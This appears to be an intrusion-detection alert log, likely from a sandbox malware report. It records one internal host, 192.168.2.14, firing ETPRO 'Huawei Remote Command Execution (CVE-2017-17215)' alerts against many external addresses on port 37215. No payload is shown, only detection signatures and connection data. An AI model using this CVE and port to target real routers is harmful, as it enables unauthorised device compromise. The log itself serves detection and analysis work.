                                                        06/13/24-21:31:57.137997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309037215192.168.2.14156.45.214.160
                                                        06/13/24-21:32:15.607911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059037215192.168.2.14197.117.196.34
                                                        06/13/24-21:32:56.757759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178237215192.168.2.1441.166.247.50
                                                        06/13/24-21:32:46.509768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467637215192.168.2.14197.38.45.175
                                                        06/13/24-21:32:03.279237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068237215192.168.2.14156.66.84.142
                                                        06/13/24-21:32:32.152790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558637215192.168.2.1441.106.9.226
                                                        06/13/24-21:33:09.089206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983637215192.168.2.1441.132.20.106
                                                        06/13/24-21:33:02.937319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804837215192.168.2.1441.116.149.172
                                                        06/13/24-21:32:05.378433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621837215192.168.2.14156.176.181.151
                                                        06/13/24-21:32:52.660278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913237215192.168.2.14197.72.88.208
                                                        06/13/24-21:32:03.277043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299837215192.168.2.14156.224.73.220
                                                        06/13/24-21:32:58.823752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121037215192.168.2.14197.169.150.92
                                                        06/13/24-21:32:52.669677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660237215192.168.2.1441.153.42.25
                                                        06/13/24-21:32:50.611393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984437215192.168.2.14197.20.147.205
                                                        06/13/24-21:32:11.507869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601437215192.168.2.14156.62.116.8
                                                        06/13/24-21:32:21.786089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863437215192.168.2.1441.10.115.198
                                                        06/13/24-21:32:52.658684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656237215192.168.2.14156.136.138.4
                                                        06/13/24-21:32:52.678131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839837215192.168.2.14156.92.41.224
                                                        06/13/24-21:32:56.759124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585237215192.168.2.14156.172.181.201
                                                        06/13/24-21:33:07.042050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626237215192.168.2.14156.193.238.20
                                                        06/13/24-21:32:09.458151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577637215192.168.2.14156.138.65.69
                                                        06/13/24-21:32:28.028240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501837215192.168.2.1441.245.229.183
                                                        06/13/24-21:33:13.231157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630637215192.168.2.14197.61.140.181
                                                        06/13/24-21:32:48.568567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343837215192.168.2.14197.245.154.140
                                                        06/13/24-21:32:25.997108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789437215192.168.2.14197.94.101.36
                                                        06/13/24-21:32:44.453425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610237215192.168.2.14197.63.25.218
                                                        06/13/24-21:32:09.436737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487237215192.168.2.1441.244.246.14
                                                        06/13/24-21:32:25.995205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823637215192.168.2.14156.164.161.109
                                                        06/13/24-21:33:09.087285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.14156.40.189.53
                                                        06/13/24-21:32:15.632501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658237215192.168.2.14197.166.3.156
                                                        06/13/24-21:32:42.407492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067837215192.168.2.14156.154.88.225
                                                        06/13/24-21:32:03.275972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961437215192.168.2.14156.105.185.32
                                                        06/13/24-21:32:05.344901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.1441.164.253.87
                                                        06/13/24-21:32:03.294852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310437215192.168.2.14197.246.186.62
                                                        06/13/24-21:32:13.546147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416837215192.168.2.14197.95.210.112
                                                        06/13/24-21:32:54.710572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768437215192.168.2.14197.87.58.248
                                                        06/13/24-21:32:58.840089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371637215192.168.2.14156.75.77.221
                                                        06/13/24-21:32:15.611086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084637215192.168.2.1441.172.10.205
                                                        06/13/24-21:33:00.888317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631637215192.168.2.1441.90.66.122
                                                        06/13/24-21:32:30.124201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.1441.138.36.177
                                                        06/13/24-21:32:17.671665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299637215192.168.2.1441.187.196.192
                                                        06/13/24-21:32:21.787514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651237215192.168.2.14197.250.197.124
                                                        06/13/24-21:32:54.708128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071237215192.168.2.14197.130.231.202
                                                        06/13/24-21:33:04.991273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077437215192.168.2.1441.163.167.252
                                                        06/13/24-21:33:00.872162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612237215192.168.2.14197.207.17.254
                                                        06/13/24-21:32:40.375559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956437215192.168.2.1441.221.63.80
                                                        06/13/24-21:32:32.155692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658837215192.168.2.1441.131.245.62
                                                        06/13/24-21:31:57.153501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239437215192.168.2.14197.219.108.12
                                                        06/13/24-21:32:52.676572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372237215192.168.2.14197.163.98.27
                                                        06/13/24-21:32:19.753422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162837215192.168.2.14197.113.94.117
                                                        06/13/24-21:32:32.165064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236637215192.168.2.14156.233.18.155
                                                        06/13/24-21:32:13.570364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980637215192.168.2.1441.64.152.215
                                                        06/13/24-21:32:19.731033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786237215192.168.2.1441.230.181.14
                                                        06/13/24-21:33:04.988702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732437215192.168.2.14156.235.251.24
                                                        06/13/24-21:33:09.112220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104437215192.168.2.14156.59.208.48
                                                        06/13/24-21:32:03.277008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944637215192.168.2.14197.136.2.96
                                                        06/13/24-21:32:11.510133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652637215192.168.2.14156.136.173.83
                                                        06/13/24-21:32:23.831915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235837215192.168.2.14197.220.181.235
                                                        06/13/24-21:33:11.177908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390837215192.168.2.14156.177.148.112
                                                        06/13/24-21:33:11.178026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.1441.58.226.196
                                                        06/13/24-21:33:07.040447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398637215192.168.2.1441.164.167.40
                                                        06/13/24-21:32:52.670837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857237215192.168.2.14156.186.120.241
                                                        06/13/24-21:32:25.970136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419837215192.168.2.14197.254.184.25
                                                        06/13/24-21:32:05.350284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732837215192.168.2.14197.43.255.17
                                                        06/13/24-21:33:09.090635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5176637215192.168.2.14197.237.132.9
                                                        06/13/24-21:32:17.697176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325637215192.168.2.14197.211.188.147
                                                        06/13/24-21:32:52.657672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338037215192.168.2.14156.212.237.11
                                                        06/13/24-21:32:54.710810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815237215192.168.2.14156.105.12.29
                                                        06/13/24-21:32:52.678828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446237215192.168.2.14197.179.249.183
                                                        06/13/24-21:32:28.046149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983037215192.168.2.14197.198.110.71
                                                        06/13/24-21:31:59.175776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556637215192.168.2.14156.102.62.53
                                                        06/13/24-21:31:59.196114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083237215192.168.2.14197.216.251.19
                                                        06/13/24-21:31:57.092105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787837215192.168.2.1441.202.231.52
                                                        06/13/24-21:32:21.802716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865837215192.168.2.14156.133.172.33
                                                        06/13/24-21:32:52.680759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351037215192.168.2.14197.87.124.48
                                                        06/13/24-21:32:23.835593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159037215192.168.2.14156.62.146.217
                                                        06/13/24-21:33:11.178082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244837215192.168.2.14197.136.88.106
                                                        06/13/24-21:33:07.039190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14197.45.23.31
                                                        06/13/24-21:33:09.107870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602437215192.168.2.1441.119.149.172
                                                        06/13/24-21:33:02.952512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527237215192.168.2.14197.159.164.1
                                                        06/13/24-21:32:58.839280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.14156.197.179.169
                                                        06/13/24-21:33:02.912396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.14197.70.58.77
                                                        06/13/24-21:32:48.555470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501037215192.168.2.14197.220.143.227
                                                        06/13/24-21:32:19.752826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514237215192.168.2.14156.50.238.25
                                                        06/13/24-21:33:17.338120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628437215192.168.2.1441.30.135.185
                                                        06/13/24-21:32:36.248584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.1441.140.21.111
                                                        06/13/24-21:32:03.280029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973437215192.168.2.14197.158.144.70
                                                        06/13/24-21:32:05.344859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096637215192.168.2.1441.252.42.85
                                                        06/13/24-21:32:05.370509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104637215192.168.2.14197.86.61.243
                                                        06/13/24-21:32:36.268756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323437215192.168.2.1441.52.233.105
                                                        06/13/24-21:32:17.674323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403037215192.168.2.1441.246.165.35
                                                        06/13/24-21:33:00.889623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754637215192.168.2.14156.247.162.52
                                                        06/13/24-21:32:28.028075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384237215192.168.2.14156.163.244.251
                                                        06/13/24-21:32:34.215640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779837215192.168.2.1441.21.165.87
                                                        06/13/24-21:32:40.356166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401637215192.168.2.1441.222.100.221
                                                        06/13/24-21:32:42.404143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054637215192.168.2.14156.214.187.242
                                                        06/13/24-21:32:46.526214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975637215192.168.2.1441.105.248.26
                                                        06/13/24-21:32:21.779763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450437215192.168.2.14197.87.39.124
                                                        06/13/24-21:32:09.440232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335437215192.168.2.14197.5.150.53
                                                        06/13/24-21:33:02.935562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985237215192.168.2.1441.194.91.52
                                                        06/13/24-21:32:40.375856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14197.23.108.25
                                                        06/13/24-21:32:36.269553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749437215192.168.2.14156.241.188.96
                                                        06/13/24-21:32:09.438825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738237215192.168.2.1441.46.243.246
                                                        06/13/24-21:33:00.871996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369037215192.168.2.14197.207.36.166
                                                        06/13/24-21:32:36.263933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.14197.29.252.192
                                                        06/13/24-21:32:44.457441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577237215192.168.2.14197.251.219.242
                                                        06/13/24-21:32:11.485127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3415037215192.168.2.14197.121.195.184
                                                        06/13/24-21:33:13.231918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778037215192.168.2.1441.82.190.223
                                                        06/13/24-21:32:40.357040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468237215192.168.2.14197.29.112.112
                                                        06/13/24-21:32:44.454156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807037215192.168.2.1441.57.128.109
                                                        06/13/24-21:32:07.419838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849637215192.168.2.1441.175.40.121
                                                        06/13/24-21:32:17.670522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.14156.203.73.240
                                                        06/13/24-21:32:36.265637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482037215192.168.2.1441.72.110.43
                                                        06/13/24-21:32:21.804036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076437215192.168.2.14197.238.1.97
                                                        06/13/24-21:31:59.195740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14197.163.130.107
                                                        06/13/24-21:32:32.166856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968237215192.168.2.14197.198.74.150
                                                        06/13/24-21:32:44.479836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397837215192.168.2.1441.98.118.89
                                                        06/13/24-21:33:00.872332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665637215192.168.2.14156.132.101.137
                                                        06/13/24-21:32:01.248742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497637215192.168.2.14197.25.21.72
                                                        06/13/24-21:32:09.438369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305637215192.168.2.1441.116.120.117
                                                        06/13/24-21:33:00.886927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623237215192.168.2.14156.33.141.128
                                                        06/13/24-21:32:44.457702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489437215192.168.2.14156.155.203.213
                                                        06/13/24-21:33:07.040683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.1441.175.124.178
                                                        06/13/24-21:32:28.026660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.14197.76.172.27
                                                        06/13/24-21:32:50.611166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842437215192.168.2.14197.122.125.200
                                                        06/13/24-21:32:52.677861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.1441.128.61.121
                                                        06/13/24-21:33:15.275819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591437215192.168.2.14197.62.190.199
                                                        06/13/24-21:32:09.460112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010237215192.168.2.14197.50.213.153
                                                        06/13/24-21:32:30.096396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964237215192.168.2.14197.242.105.237
                                                        06/13/24-21:32:15.611145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384237215192.168.2.14156.232.89.123
                                                        06/13/24-21:32:58.844142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009437215192.168.2.14156.180.2.221
                                                        06/13/24-21:33:15.255458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137237215192.168.2.14156.148.189.65
                                                        06/13/24-21:32:50.611309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618037215192.168.2.1441.214.17.35
                                                        06/13/24-21:32:56.786221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749237215192.168.2.1441.10.70.71
                                                        06/13/24-21:32:46.524903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386637215192.168.2.14156.121.45.56
                                                        06/13/24-21:32:30.095924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113037215192.168.2.1441.157.162.253
                                                        06/13/24-21:32:21.782377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14156.202.144.21
                                                        06/13/24-21:32:17.693915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541037215192.168.2.1441.3.149.33
                                                        06/13/24-21:32:32.152232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339037215192.168.2.1441.217.15.129
                                                        06/13/24-21:32:01.224181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025437215192.168.2.1441.164.131.110
                                                        06/13/24-21:32:58.841887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.14197.13.89.57
                                                        06/13/24-21:33:15.258386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047237215192.168.2.1441.47.170.38
                                                        06/13/24-21:32:30.097565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476837215192.168.2.1441.130.158.26
                                                        06/13/24-21:32:42.403982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031237215192.168.2.14156.151.141.142
                                                        06/13/24-21:32:42.417843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052237215192.168.2.14197.102.169.216
                                                        06/13/24-21:32:15.611067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897837215192.168.2.14197.29.250.59
                                                        06/13/24-21:32:19.729569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.14197.140.75.117
                                                        06/13/24-21:32:13.544131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529437215192.168.2.1441.12.78.27
                                                        06/13/24-21:32:40.372209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527837215192.168.2.14156.71.62.141
                                                        06/13/24-21:33:02.911439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041437215192.168.2.14197.164.219.73
                                                        06/13/24-21:33:00.883983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754637215192.168.2.1441.240.131.182
                                                        06/13/24-21:33:05.013691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599637215192.168.2.1441.59.116.84
                                                        06/13/24-21:32:30.097964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334437215192.168.2.14197.248.4.121
                                                        06/13/24-21:32:38.317297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388237215192.168.2.14156.52.39.12
                                                        06/13/24-21:32:42.408616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092837215192.168.2.14156.153.146.234
                                                        06/13/24-21:32:56.754876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435237215192.168.2.1441.130.8.97
                                                        06/13/24-21:31:57.133452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470837215192.168.2.1441.115.70.80
                                                        06/13/24-21:32:13.566525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773437215192.168.2.1441.129.203.151
                                                        06/13/24-21:32:07.402942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992637215192.168.2.1441.10.47.182
                                                        06/13/24-21:32:30.079117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412037215192.168.2.1441.157.197.117
                                                        06/13/24-21:32:01.238712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721437215192.168.2.1441.97.253.112
                                                        06/13/24-21:32:25.975141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404437215192.168.2.14156.44.145.126
                                                        06/13/24-21:32:11.485436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099037215192.168.2.14197.183.21.140
                                                        06/13/24-21:32:52.655320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682237215192.168.2.14156.147.181.0
                                                        06/13/24-21:33:02.914738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775837215192.168.2.14197.20.24.186
                                                        06/13/24-21:32:25.995941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803437215192.168.2.14156.158.175.28
                                                        06/13/24-21:32:11.487858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497637215192.168.2.14156.158.87.233
                                                        06/13/24-21:32:42.424958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.1441.172.125.245
                                                        06/13/24-21:33:09.088141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336437215192.168.2.14156.72.6.186
                                                        06/13/24-21:33:15.277300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.14197.57.3.107
                                                        06/13/24-21:32:25.994812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736037215192.168.2.14197.10.97.73
                                                        06/13/24-21:33:13.231315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046037215192.168.2.1441.169.126.236
                                                        06/13/24-21:32:52.657772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121437215192.168.2.14197.166.171.152
                                                        06/13/24-21:32:50.611690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897037215192.168.2.1441.188.248.35
                                                        06/13/24-21:32:38.320210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533637215192.168.2.1441.246.187.205
                                                        06/13/24-21:33:11.178149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083837215192.168.2.14197.12.42.188
                                                        06/13/24-21:31:57.135784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407037215192.168.2.14197.187.123.53
                                                        06/13/24-21:32:36.245571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661237215192.168.2.14197.139.73.251
                                                        06/13/24-21:32:54.726285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823437215192.168.2.1441.165.226.39
                                                        06/13/24-21:33:02.912761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646037215192.168.2.1441.100.28.120
                                                        06/13/24-21:33:11.177971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547837215192.168.2.14197.99.202.211
                                                        06/13/24-21:32:11.508383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952037215192.168.2.14197.219.130.225
                                                        06/13/24-21:33:05.011456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848637215192.168.2.14156.181.151.83
                                                        06/13/24-21:32:42.407931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778637215192.168.2.14156.42.248.156
                                                        06/13/24-21:33:17.309717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14156.166.12.216
                                                        06/13/24-21:32:54.725389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979637215192.168.2.1441.49.94.137
